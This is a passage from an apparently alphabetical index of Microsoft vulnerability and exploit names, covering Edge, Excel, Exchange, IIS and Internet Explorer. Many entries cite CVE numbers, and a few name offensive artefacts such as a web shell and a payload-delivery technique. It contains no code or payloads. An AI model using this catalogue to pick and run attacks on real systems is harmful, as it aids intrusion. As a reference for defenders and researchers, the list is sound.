Microsoft-Edge-Memory-Corruption-CVE-2016-0024
Microsoft-Edge-Memory-Corruption-CVE-2016-3199
Microsoft-Edge-Memory-Corruption-CVE-2016-3222
Microsoft-Edge-Memory-Corruption-CVE-2016-3271
Microsoft-Edge-Memory-Corruption-CVE-2017-0010
Microsoft-Edge-Memory-Corruption-CVE-2017-0141
Microsoft-Edge-Memory-Corruption-CVE-2018-0980
Microsoft-Edge-Memory-Corruption-CVE-2018-8110
Microsoft-Edge-Memory-Corruption-CVE-2018-8111
Microsoft-Edge-Memory-Corruption-CVE-2018-8236
Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2016-0191
Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0758
Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0762
Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0777
Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0872
Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0874
Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0889
Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0893
Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0930
Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0933
Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0934
Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2018-8137
Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0610
Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0644
Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0648
Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0652
Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0658
Microsoft-Edge-PDF-Remote-Code-Execution-CVE-2018-8464
Microsoft-Edge-PreVisitCatch-Uninitialized-Memory-Use
Microsoft-Edge-Profiledldelem-Type-Confusion
Microsoft-Edge-RCE-CVE-2017-0227
Microsoft-Edge-RCE-CVE-2017-0228
Microsoft-Edge-RCE-CVE-2017-0236
Microsoft-Edge-RCE-CVE-2017-0238
Microsoft-Edge-RCE-CVE-2017-0240
Microsoft-Edge-Remote-Code-Execution-CVE-2019-0541
Microsoft-Edge-Remote-Code-Execution-Vulnerability-CVE-2017-8496
Microsoft-Edge-Remote-Code-Execution-Vulnerability-CVE-2017-8497
Microsoft-Edge-Remote-Code-Execution-Vulnerability-CVE-2017-8617
Microsoft-Edge-Scripting-Engine-CVE-2016-7240-Memory-Corruption
Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2018-8367
Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2018-8391
Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2018-8456
Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2018-8459
Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2018-8643
Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2019-0539
Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2019-0565
Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2019-0568
Microsoft-Edge-Security-Feature-Bypass-CVE-2016-3198
Microsoft-Edge-Spoofing-Vulnerability-2018-8383
Microsoft-Edge-Type-Confusion-CVE-2018-8588
Microsoft-Edge-Type-Confusion-Remote-Code-Execution-CVE-2017-8524
Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2017-8601
Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-0951
Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-0953
Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-0993
Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8133
Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8179
Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8583
Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8618
Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8624
Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8629
Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0590
Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0591
Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0593
Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0606
Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0607
Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0650
Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0651
Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0655
Microsoft-Edge-Typedarray.sort-Use-After-Free
Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2017-8605
Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2018-0946
Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2018-0954
Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2018-0995
Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2018-8123
Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2019-0640
Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2019-0645
Microsoft-Edge-Vulnerability-CVE-2016-3264
Microsoft-Embedded-OpenType-EOT-Font-Integer-Overflow
Microsoft-Embedded-OpenType-Font-Engine-Heap-Overflow
Microsoft-Embedded-OpenType-Font-Engine-Integer-Overflow
Microsoft-Embedded-Web-Font-Buffer-Overflow
Microsoft-Excel-Array-Indexing-Vulnerability-CVE-2011-0978
Microsoft-Excel-Array-Indexing-Vulnerability-CVE-2011-1990
Microsoft-Excel-Axisparent-Record-Index-Handling-Code-Execution
Microsoft-Excel-Biff-File-Format-Named-Graph-Record-Parsing-Stack-Overflow
Microsoft-Excel-Buffer-Overrun-Vulnerability-CVE-2011-1276
Microsoft-Excel-Colinfo-Record-Buffer-Overflow
Microsoft-Excel-Column-Record-Handling-Memory-Corruption
Microsoft-Excel-Conditional-Expression-Parsing-Vulnerability
Microsoft-Excel-Conditional-Formatting-Values-Handling-Code-Execution
Microsoft-Excel-Continuefrt12-Record-Parsing-Heap-Buffer-Overflow
Microsoft-Excel-Crafted-Picture-Record-Code-Execution
Microsoft-Excel-Crafted-Url-Buffer-Overflow
Microsoft-Excel-CVE-2016-7262-Security-Feature-Bypass
Microsoft-Excel-Dangling-Pointer-Vulnerability-CVE-2011-0980
Microsoft-Excel-Data-Initialization-Vulnerability-CVE-2011-0105
Microsoft-Excel-DbOrParamQry-Record-Parsing-CVE-2010-0264
Microsoft-Excel-Embedded-Shockwave-Flash-Object-Code-Execution
Microsoft-Excel-ExternName-Record-Parsing-Buffer-Overflow-CVE-2010-1249
Microsoft-Excel-File-Handling-Code-Execution-Vulnerability
Microsoft-Excel-File-Importing-Code-Execution
Microsoft-Excel-File-Parsing-Memory-Corruption
Microsoft-Excel-FNGROUPNAME-Record-Uninitialized-Memory-CVE-2010-0262
Microsoft-Excel-For-Asian-Languages-Style-Handling-Buffer-Overflow
Microsoft-Excel-Format-Record-Array-Index-Memory-Corruption
Microsoft-Excel-Frtwrapper-Record-Buffer-Overflow
Microsoft-Excel-Graphic-Object-Deref-Vulnerability-CVE-2011-0977
Microsoft-Excel-Heap-Corruption-Vulnerability
Microsoft-Excel-Heap-Overflow-Vulnerability-CVE-2011-0098
Microsoft-Excel-Improper-Record-Parsing-Vulnerability-CVE-2011-1273
Microsoft-Excel-Information-Disclosure-Vulnerability-CVE-2019-1112
Microsoft-Excel-Integer-Overrun-Vulnerability-CVE-2011-0097
Microsoft-Excel-Linked-List-Corruption-Vulnerability-CVE-2011-0979
Microsoft-Excel-Malformed-File-Format-Parsing-Code-Execution
Microsoft-Excel-Malformed-Filter-Records-Handling-Code-Execution
Microsoft-Excel-Malformed-Fngroupcount-Value-Code-Execution
Microsoft-Excel-Malformed-Formula-Parsing-Code-Execution
Microsoft-Excel-Malformed-Imdata-Record
Microsoft-Excel-Malformed-Palette-Record-Memory-Corruption
Microsoft-Excel-Malformed-Record-Code-Execution
Microsoft-Excel-Malformed-Selection-Record-Code-Execution
Microsoft-Excel-MDXSET-Record-Heap-Overflow-CVE-2010-0261
Microsoft-Excel-MDXTUPLE-Record-Heap-Overflow-CVE-2010-0260
Microsoft-Excel-Memory-Corruption-CVE-2012-1886
Microsoft-Excel-Memory-Heap-Overwrite-Vulnerability-CVE-2011-1275
Microsoft-Excel-Merge-Cell-Record-Pointer-CVE-2010-3237
Microsoft-Excel-MergeCells-Record-Heap-Overflow-Vulnerability
Microsoft-Excel-Name-Record-Array-Indexing-Stack-Corruption
Microsoft-Excel-Note-Record-Information-Disclosure-CVE-2018-8382
Microsoft-Excel-Null-Pointer-DoS
Microsoft-Excel-OBJECTLINK-Memory-Corruption-Vulnerability
Microsoft-Excel-Office-Drawing-Layer-Remote-Code-Execution
Microsoft-Excel-Out-Of-Bounds-Array-Access-Vulnerability-CVE-2011-1274
Microsoft-Excel-Out-Of-Bounds-Array-Indexing-Vulnerability
Microsoft-Excel-Parsed-Expression-Information-Disclosure-CVE-2018-8246
Microsoft-Excel-Ptgextraarray-Parsing-Memory-Corruption
Microsoft-Excel-Real-Time-Data-Array-Record-CVE-2010-3240
Microsoft-Excel-Record-Memory-Corruption-CVE-2010-0257
Microsoft-Excel-Record-Memory-Corruption-CVE-2011-3403
Microsoft-Excel-Record-Parsing-Integer-Overflow-CVE-2010-3230
Microsoft-Excel-Record-Parsing-WriteAV-Vulnerability-CVE-2011-0101
Microsoft-Excel-Rept-Function-Integer-Overflow
Microsoft-Excel-Rich-Text-Handling-Code-Execution
Microsoft-Excel-rtWindow1-Record-Handling-Code-Execution
Microsoft-Excel-Security-Feature-Bypass
Microsoft-Excel-SerAuxErrBar-Heap-Overflow
Microsoft-Excel-Set-Font-Handling-Code-Execution
Microsoft-Excel-SLK-Payload-Delivery
Microsoft-Excel-Sst-Invalid-Length-Use-After-Free
Microsoft-Excel-Style-Record-Data-Handling-Code-Execution
Microsoft-Excel-SXLI-Record-Memory-Corruption-Vulnerability
Microsoft-Excel-SxView-Record-Parsing-Memory-Corruption-CVE-2010-0821
Microsoft-Excel-Txo-And-Obj-Records-Parsing-Stack-Memory-Corruption
Microsoft-Excel-Type-Mismatch-Series-Record-Parsing-Memory-Corruption
Microsoft-Excel-Use-After-Free-WriteAV-Vulnerability
Microsoft-Excel-Version-Information-Handling-Code-Execution
Microsoft-Excel-Window2-Record-Use-After-Free
Microsoft-Excel-Workbook-Workspace-Designation-Handling-Code-Execution
Microsoft-Excel-Workspace-Index-Value-Memory-Corruption
Microsoft-Excel-WriteAV-Vulnerability-CVE-2011-1278
Microsoft-Exchange-Addtenantdlppolicy-Ruleparameters-Remote-Code-Execution
Microsoft-Exchange-And-Outlook-TNEF-Decoding-Buffer-Overflow
Microsoft-Exchange-Approvedapplication-Insecure-Deserialization
Microsoft-Exchange-Authentication-Bypass-CVE-2021-33766
Microsoft-Exchange-Calendar-Code-Execution
Microsoft-Exchange-CVE-2020-16875-Remote-Code-Execution
Microsoft-Exchange-CVE-2021-26858-Arbitrary-File-Write
Microsoft-Exchange-CVE-2021-27065-Arbitrary-File-Write
Microsoft-Exchange-Deserialization-Remote-Code-Execution
Microsoft-Exchange-Outlook-Compressed-RTF-Parsing-Memory-Corruption
Microsoft-Exchange-Outlook-Web-Access-CSRF-CVE-2010-3213
Microsoft-Exchange-OWA-XSS-Spoofing
Microsoft-Exchange-Post-Auth-Arbitrary-File-Write-CVE-2021-31207
Microsoft-Exchange-PowerShell-Backend-EOP-CVE-2021-34523
Microsoft-Exchange-PowerShell-Insecure-Deserialization-CVE-2023-21707
Microsoft-Exchange-PowerShell-Insecure-Deserialization-CVE-2023-36777
Microsoft-Exchange-PowerShell-Mobilemailboxpolicy-Insecure-Deserialization
Microsoft-Exchange-PowerShell-Remoting-Command-Insecure-Deserialization
Microsoft-Exchange-PowerShell-Remoting-Dumpdatareader-Insecure-Deserialization
Microsoft-Exchange-PowerShell-Remoting-Federationtrust-Insecure-Deserialization
Microsoft-Exchange-PowerShell-Remoting-Gsmwriter-Insecure-Deserialization
Microsoft-Exchange-PowerShell-Remoting-Xamlimageinfo-Insecure-Deserialization
Microsoft-Exchange-Privilege-Escalation-Exploit
Microsoft-Exchange-Privilege-Escalation-Exploit-CVE-2018-8581
Microsoft-Exchange-ProxyShell-RCE
Microsoft-Exchange-Server-CVE-2022-23277-Insecure-Deserialization
Microsoft-Exchange-Server-CVE-2022-24463-External-Entity-Injection
Microsoft-Exchange-Server-Elevation-Of-Privilege-Vulnerability-CVE-2022-41080
Microsoft-Exchange-Server-Ews-Userconfiguration-Insecure-Deserialization
Microsoft-Exchange-Server-ExportExhangeCertificate-Arbitrary-File-Write
Microsoft-Exchange-Server-ICalendar-DOS
Microsoft-Exchange-Server-ImportTransportRuleCollection-RCE
Microsoft-Exchange-Server-Mime-Base64-Decoding-Code-Execution
Microsoft-Exchange-Server-NewExchangeCertificate-Arbitrary-File-Write
Microsoft-Exchange-Server-Outlook-Web-Access-Script-Injection
Microsoft-Exchange-Server-Reflected-Cross-Site-Scripting
Microsoft-Exchange-Server-SSRF-Vulnerability-CVE-2021-26855
Microsoft-Exchange-Sharedtyperesolver-Insecure-Deserialization
Microsoft-Exchange-SSRF-CVE-2021-34473
Microsoft-Exchange-SSRF-CVE-2022-41040
Microsoft-Exchange-TNEF-Buffer-Overflow-MS09-003
Microsoft-Exchange-Transportconfigcontainer-Insecure-Deserialization
Microsoft-Exchange-Unsafe-Deserialization-CVE-2022-41082
Microsoft-Exchange-Unsafe-Deserialization-CVE-2023-21529
Microsoft-Exchange-Unsafe-Deserialization-CVE-2023-21706
Microsoft-Exchange-Validation-Key-Remote-Code-Execution
Microsoft-Exchange-XSS-CVE-2015-1632
Microsoft-Explorer-Long-Share-Name-Buffer-Overflow
Microsoft-Expression-Design-Insecure-Library-Loading-CVE-2012-0016
Microsoft-Filter-Manager-Elevation-Of-Privilege-Vulnerability-CVE-2018-8333
Microsoft-Forefront-Unified-Access-Gateway-Signurl.asp-XSS
Microsoft-FrontPage-Information-Disclosure-Vulnerability
Microsoft-FrontPage-Server-Extensions-MS-DOS-Device-Name-Denial-Of-Service
Microsoft-GDI-Vulnerability-CVE-2009-2501
Microsoft-Graphics-Component-Createcolorspacew-Information-Disclosure
Microsoft-Graphics-Component-CVE-2016-0169-Information-Disclosure
Microsoft-Graphics-Component-CVE-2016-3348
Microsoft-Graphics-Component-CVE-2017-0025
Microsoft-Graphics-Component-CVE-2018-8396-Information-Disclosure
Microsoft-Graphics-Component-CVE-2018-8472-Information-Disclosure
Microsoft-Graphics-Component-Information-Disclosure-CVE-2014-6355
Microsoft-Graphics-Device-Interface-CVE-2016-3263-Information-Disclosure
Microsoft-Graphics-Device-Interface-CVE-2018-8397-Code-Execution
Microsoft-Graphics-Device-Interface-CVE-2019-0619-Information-Disclosure
Microsoft-Graphics-Device-Interface-CVE-2019-0961-Information-Disclosure
Microsoft-Graphics-Device-Interface-Information-Disclosure-CVE-2019-0616
Microsoft-Graphics-Device-Interface-Wemrtext-Information-Disclosure
Microsoft-Graphics-Heap-Buffer-Overflow-Vulnerability-CVE-2018-1010
Microsoft-Graphics-Integer-Overflow-Vulnerability-CVE-2018-1015
Microsoft-Graphics-Integer-Overflow-Vulnerability-CVE-2018-1016
Microsoft-Graphics-Integer-Signedness-Vulnerability-CVE-2018-1012
Microsoft-Graphics-Integer-Signedness-Vulnerability-CVE-2018-1013
Microsoft-Graphics-Rendering-Engine-Thumbnail-Stack-Buffer-Overflow
Microsoft-Groove-Insecure-Library-Loading-CVE-2011-3146
Microsoft-Help-Centre-Malformed-Escape-Sequence
Microsoft-Help-Workshop-CNT-Help-Contents-Buffer-Overflow
Microsoft-Help-Workshop-Hpj-Options-Section-Buffer-Overflow
Microsoft-Host-Integration-Server-Remote-Command-Execution-Vulnerability
Microsoft-Host-Integration-Server-Snabase-CVE-2011-2007
Microsoft-Host-Integration-Server-Snabase.exe-Infinite-Loop-DOS
Microsoft-HTTP-Services-Chunked-Encoding-Integer-Overflow
Microsoft-HTTP.sys-HTTP-2.0-Denial-Of-Service
Microsoft-Hyperlink-Object-Library-Information-Disclosure
Microsoft-Ie-CVE-2016-7198
Microsoft-Ie-ExecScript-File-Disclosure
Microsoft-Ie-NMSA.ASFSourceMediaDescription-DoS-Vulnerability
Microsoft-Ie-PNG-Parsing-Vulnerability-CVE-2015-0080
Microsoft-Ie-RDS.DataControl.URL-DoS
Microsoft-Ie-setHomePage-Function-Vulnerability
Microsoft-Ie-Use-After-Free-CVE-2016-7196
Microsoft-IIS-5.0-WebDav-Request-Directory-Security-Bypass
Microsoft-IIS-6-ScStoragePathFromUrl-Buffer-Overflow
Microsoft-IIS-7.x-Server-Header
Microsoft-IIS-Cachuri-Tree_Hash_Table-Denial-of-Service
Microsoft-IIS-Cmdasp.asp
Microsoft-IIS-Directory-Authentication-Security-Bypass
Microsoft-IIS-FTP-Denial-Of-Service-CVE-2009-2521
Microsoft-IIS-FTP-Server-Nlst-Buffer-Overflow
Microsoft-IIS-FTP-Server-Telnet-IAC-Buffer-Overflow
Microsoft-IIS-HTTP-Protocol-Stack-Remote-Code-Execution
Microsoft-IIS-IDA-Path-Disclosure
Microsoft-IIS-Multiple-Extensions-Security-Bypass
Microsoft-IIS-Remote-Code-Execution-CVE-2015-1635
Microsoft-IIS-Repeated-Parameter-Request-CVE-2010-1899
Microsoft-IIS-Repeated-Parameter-Request-Denial-Of-Service
Microsoft-IIS-Request-Header-Buffer-Overflow
Microsoft-IIS-Schannel-Improper-Certificate-Verification
Microsoft-IIS-Server-Crafted-Asp-Page-Buffer-Overflow
Microsoft-IIS-UNC-Path-Disclosure-Vulnerability
Microsoft-IIS-UNC-Path-Source-Disclosure
Microsoft-Indeo-Codec-Insecure-Library-Loading-Vulnerability
Microsoft-Internet-Connection-Wizard-Insecure-Loading-CVE-2010-3144
Microsoft-Internet-Explorer-7-WebDAV-Pathname-Code-Execution
Microsoft-Internet-Explorer-8-Developer-Tools-Code-Execution-CVE-2010-0811
Microsoft-Internet-Explorer-8-Ieshims.dll-Insecure-Library-Loading
Microsoft-Internet-Explorer-Address-Bar-Spoofing-Vulnerability
Microsoft-Internet-Explorer-And-Edge-Blocksite.htm-Spoofing
Microsoft-Internet-Explorer-And-Edge-Column-span-Type-Confusion
Microsoft-Internet-Explorer-And-Edge-CVE-2015-6140-Memory-Corruption
Microsoft-Internet-Explorer-And-Edge-CVE-2016-0061-Type-Confusion
Microsoft-Internet-Explorer-And-Edge-CVE-2016-0154-Memory-Corruption
Microsoft-Internet-Explorer-And-Edge-CVE-2016-3247-Memory-Corruption
Microsoft-Internet-Explorer-And-Edge-CVE-2016-3325-Information-Disclosure
Microsoft-Internet-Explorer-And-Edge-CVE-2016-3351-Information-Disclosure
Microsoft-Internet-Explorer-And-Edge-CVE-2016-7195-Information-Disclosure
Microsoft-Internet-Explorer-And-Edge-CVE-2016-7202-Memory-Corruption
Microsoft-Internet-Explorer-And-Edge-CVE-2016-7287-Type-Confusion
Microsoft-Internet-Explorer-And-Edge-Json.parse-Type-Confusion
Microsoft-Internet-Explorer-And-Edge-Memory-Corruption-CVE-2016-3297
Microsoft-Internet-Explorer-And-Edge-Substring-New-Out-Of-Bounds-Read
Microsoft-Internet-Explorer-And-Sharepoint-Services-HTML-Sanitization-XSS
Microsoft-Internet-Explorer-And-Sharepoint-toStaticHTML-Information-Disclosure
Microsoft-Internet-Explorer-Animatemotion-Properties-Assignment-Vulnerability
Microsoft-Internet-Explorer-Array-Type-Confusion
Microsoft-Internet-Explorer-Arraybuffer.slice-Information-Disclosure
Microsoft-Internet-Explorer-ASLR-Bypass-CVE-2015-2421
Microsoft-Internet-Explorer-Asynchronous-Null-Memory-Corruption
Microsoft-Internet-Explorer-Attribute-Removal-Memory-Corruption
Microsoft-Internet-Explorer-Attribute-Value-Type-Confusion
Microsoft-Internet-Explorer-Body-Element-Use-After-Free
Microsoft-Internet-Explorer-Body-Replace-Memory-Corruption-CVE-2015-6150
Microsoft-Internet-Explorer-BrowseDialog-ActiveX-Control-Denial-of-Service
Microsoft-Internet-Explorer-Cattrarray-Type-Confusion
Microsoft-Internet-Explorer-CDF-Cross-Domain-Scripting
Microsoft-Internet-Explorer-CElement-Memory-Corruption
Microsoft-Internet-Explorer-Center-Element-Out-Of-Bounds-Array-Indexing
Microsoft-Internet-Explorer-CFormElement-Use-After-Free-Vulnerability
Microsoft-Internet-Explorer-Cgeneratedcontent-Unwrapcontent-Memory-Corruption
Microsoft-Internet-Explorer-CGenericElement-Memory-Corruption
Microsoft-Internet-Explorer-CHTML-Use-After-Free-CVE-2013-0028
Microsoft-Internet-Explorer-Clipboard-Information-Disclosure
Microsoft-Internet-Explorer-Cloned-Object-Memory-Corruption
Microsoft-Internet-Explorer-cloneNode-Use-After-Free
Microsoft-Internet-Explorer-Code-Execution-SA2757760
Microsoft-Internet-Explorer-Col-Element-Heap-Memory-Corruption
Microsoft-Internet-Explorer-Compressed-Content-URL-Heap-Overflow
Microsoft-Internet-Explorer-Copy-And-Paste-Information-Disclosure
Microsoft-Internet-Explorer-Cpastecommand-Use-After-Free
Microsoft-Internet-Explorer-Createrange-Cross-Domain-Scripting
Microsoft-Internet-Explorer-Cross-Domain-Information-Disclosure-CVE-2010-3330
Microsoft-Internet-Explorer-Cross-Domain-JavaScript-Injection
Microsoft-Internet-Explorer-Cross-Frame-Scripting-Restriction-Bypass
Microsoft-Internet-Explorer-Cross-Site-Scripting-CVE-2010-3243
Microsoft-Internet-Explorer-Cross-Site-Scripting-CVE-2010-3324
Microsoft-Internet-Explorer-Cstr-Use-After-Free
Microsoft-Internet-Explorer-Ctablecell-Information-Disclosure
Microsoft-Internet-Explorer-Ctablecolcalc-Memory-Corruption
Microsoft-Internet-Explorer-Ctitleelement-Use-After-Free
Microsoft-Internet-Explorer-CTreePos-Use-After-Free
Microsoft-Internet-Explorer-CTreePos-Use-After-Free-Vulnerability
Microsoft-Internet-Explorer-CTxtPtr-Memory-Access-Error
Microsoft-Internet-Explorer-CVE-2010-3971
Microsoft-Internet-Explorer-CVE-2013-3163-Use-After-Free
Microsoft-Internet-Explorer-CVE-2013-3184-Memory-Corruption
Microsoft-Internet-Explorer-CVE-2013-3203-Memory-Corruption
Microsoft-Internet-Explorer-CVE-2013-3205-Memory-Corruption
Microsoft-Internet-Explorer-CVE-2014-0274-Use-After-Free
Microsoft-Internet-Explorer-CVE-2014-0275-Use-After-Free
Microsoft-Internet-Explorer-CVE-2014-0282-Cinput-Use-After-Free
Microsoft-Internet-Explorer-CVE-2014-0283-Use-After-Free
Microsoft-Internet-Explorer-CVE-2014-0286-Use-After-Free
Microsoft-Internet-Explorer-CVE-2014-0287-Use-After-Free
Microsoft-Internet-Explorer-CVE-2014-0303-Memory-Corruption
Microsoft-Internet-Explorer-CVE-2014-0307-Use-After-Free
Microsoft-Internet-Explorer-CVE-2014-0312-Use-After-Free
Microsoft-Internet-Explorer-CVE-2014-0313-Memory-Corruption
Microsoft-Internet-Explorer-CVE-2014-0324-Memory-Corruption
Microsoft-Internet-Explorer-CVE-2014-1765-Use-After-Free
Microsoft-Internet-Explorer-CVE-2014-1815-Use-After-Free
Microsoft-Internet-Explorer-CVE-2014-2804-Use-After-Free
Microsoft-Internet-Explorer-CVE-2014-6366-Memory-Corruption
Microsoft-Internet-Explorer-CVE-2014-8966-Memory-Corruption
Microsoft-Internet-Explorer-CVE-2015-0041-Use-After-Free
Microsoft-Internet-Explorer-CVE-2015-0053-Memory-Corruption
Microsoft-Internet-Explorer-CVE-2015-0071-Policy-Bypass
Microsoft-Internet-Explorer-CVE-2015-0100-Use-After-Free
Microsoft-Internet-Explorer-CVE-2015-1665-Use-After-Free
Microsoft-Internet-Explorer-CVE-2015-1667-Use-After-Free
Microsoft-Internet-Explorer-CVE-2015-1686-Information-Disclosure
Microsoft-Internet-Explorer-CVE-2015-1687
Microsoft-Internet-Explorer-CVE-2015-1692-Information-Disclosure
Microsoft-Internet-Explorer-CVE-2015-1705-Memory-Corruption
Microsoft-Internet-Explorer-CVE-2015-1729-Information-Disclosure
Microsoft-Internet-Explorer-CVE-2015-1730
Microsoft-Internet-Explorer-CVE-2015-1733-Use-After-Release
Microsoft-Internet-Explorer-CVE-2015-1735
Microsoft-Internet-Explorer-CVE-2015-1738-Use-After-Release
Microsoft-Internet-Explorer-CVE-2015-1744
Microsoft-Internet-Explorer-CVE-2015-1745-Memory-Corruption
Microsoft-Internet-Explorer-CVE-2015-1747-Write-What-Where
Microsoft-Internet-Explorer-CVE-2015-1748
Microsoft-Internet-Explorer-CVE-2015-1750
Microsoft-Internet-Explorer-CVE-2015-1752
Microsoft-Internet-Explorer-CVE-2015-1766
Microsoft-Internet-Explorer-CVE-2015-2372-VBArray-Use-After-Release
Microsoft-Internet-Explorer-CVE-2015-2383-Use-After-Release
Microsoft-Internet-Explorer-CVE-2015-2388-Misaligned-Pointer
Microsoft-Internet-Explorer-CVE-2015-2389-Use-After-Free
Microsoft-Internet-Explorer-CVE-2015-2390-Use-After-Free
Microsoft-Internet-Explorer-CVE-2015-2391-Double-Free
Microsoft-Internet-Explorer-CVE-2015-2401-Memory-Corruption
Microsoft-Internet-Explorer-CVE-2015-2419-Jscript9-Memory-Corruption
Microsoft-Internet-Explorer-CVE-2015-2443-Memory-Corruption
Microsoft-Internet-Explorer-CVE-2015-2444-Use-After-Free
Microsoft-Internet-Explorer-CVE-2015-2446-Memory-Corruption
Microsoft-Internet-Explorer-CVE-2015-2487-Memory-Corruption
Microsoft-Internet-Explorer-CVE-2015-6042-Memory-Corruption
Microsoft-Internet-Explorer-CVE-2015-6065
Microsoft-Internet-Explorer-CVE-2015-6066
Microsoft-Internet-Explorer-CVE-2015-6068
Microsoft-Internet-Explorer-CVE-2015-6070
Microsoft-Internet-Explorer-CVE-2015-6071-Memory-Corruption
Microsoft-Internet-Explorer-CVE-2015-6075-Memory-Corruption
Microsoft-Internet-Explorer-CVE-2015-6076
Microsoft-Internet-Explorer-CVE-2015-6136-Memory-Corruption
Microsoft-Internet-Explorer-CVE-2016-3288-Memory-Corruption
Microsoft-Internet-Explorer-CVE-2016-3289
Microsoft-Internet-Explorer-CVE-2016-3293
Microsoft-Internet-Explorer-CVE-2016-3327
Microsoft-Internet-Explorer-CVE-2017-0008-Information-Disclosure
Microsoft-Internet-Explorer-CVE-2017-0018
Microsoft-Internet-Explorer-CVE-2017-0037
Microsoft-Internet-Explorer-CVE-2017-0154
Microsoft-Internet-Explorer-CVE-2018-8629
Microsoft-Internet-Explorer-CWigglyShape-Information-Disclosure
Microsoft-Internet-Explorer-Deflate-Encoding-Memory-Corruption
Microsoft-Internet-Explorer-Deleted-Data-Source-Object-Memory-Corruption
Microsoft-Internet-Explorer-Developer-Toolbar-CVE-2012-1874
Microsoft-Internet-Explorer-Developer-Toolbar-Use-After-Free
Microsoft-Internet-Explorer-Developer-Tools-CVE-2010-0811
Microsoft-Internet-Explorer-DHTML-CreateControlRange-Code-Execution
Microsoft-Internet-Explorer-DHTML-Edit-Control-Cross-Site-Scripting
Microsoft-Internet-Explorer-DHTML-Objects-Memory-Corruption
Microsoft-Internet-Explorer-DOM-Memory-Corruption
Microsoft-Internet-Explorer-DOM-Memory-Corruption-CVE-2011-1251
Microsoft-Internet-Explorer-DOM-Mergeattributes-Memory-Corruption
Microsoft-Internet-Explorer-Drag-And-Drop-CVE-2011-1254
Microsoft-Internet-Explorer-Ebcrypt-ActiveX-Denial-of-Service
Microsoft-Internet-Explorer-Embed-Element-Memory-Corruption
Microsoft-Internet-Explorer-EUC-JP-Character-Encoding-Universal-XSS
Microsoft-Internet-Explorer-Event-Handler-Use-After-Free
Microsoft-Internet-Explorer-Event-Listener-Use-After-Free
Microsoft-Internet-Explorer-execCommand-File-Type-Spoofing
Microsoft-Internet-Explorer-FTP-Client-Directory-Traversal
Microsoft-Internet-Explorer-FTP-Command-Injection
Microsoft-Internet-Explorer-Hhctrl.ocx-Image-Property-Heap-Corruption
Microsoft-Internet-Explorer-History.go-Method-Double-Free-Memory-Corruption
Microsoft-Internet-Explorer-HTML-Attribute-Handling-Memory-Corruption
Microsoft-Internet-Explorer-HTML-Element-Memory-Corruption-CVE-2010-3345
Microsoft-Internet-Explorer-HTML-Embed-Tag-Stack-Buffer-Overflow
Microsoft-Internet-Explorer-HTML-Embedded-In-Xml-Memory-Corruption
Microsoft-Internet-Explorer-HTML-Help-Remote-Code-Execution
Microsoft-Internet-Explorer-HTML-Layout-CVE-2012-0011
Microsoft-Internet-Explorer-HTML-Layout-Memory-Corruption-CVE-2010-2560
Microsoft-Internet-Explorer-HTML-Layout-Use-After-Free
Microsoft-Internet-Explorer-HTML-Object-Memory-Corruption-CVE-2010-0248
Microsoft-Internet-Explorer-HTML-Object-Memory-Corruption-CVE-2010-3340
Microsoft-Internet-Explorer-HTML-Object-Memory-Corruption-CVE-2010-3343
Microsoft-Internet-Explorer-HTML-Objects-Memory-Corruption-CVE-2009-1918
Microsoft-Internet-Explorer-HTML-Rendering-Memory-Corruption
Microsoft-Internet-Explorer-HTML-Rendering-Memory-Corruption-CVE-2006-3637
Microsoft-Internet-Explorer-HTML-Sanitization-CVE-2012-1858
Microsoft-Internet-Explorer-HTML-Tag-Memory-Corruption
Microsoft-Internet-Explorer-HTML-Time-Element-Memory-Corruption-CVE-2010-3346
Microsoft-Internet-Explorer-HTTP-Response-Double-Free-Memory-Corruption
Microsoft-Internet-Explorer-Image-Processing-Argument-Handling-Memory-Corruption
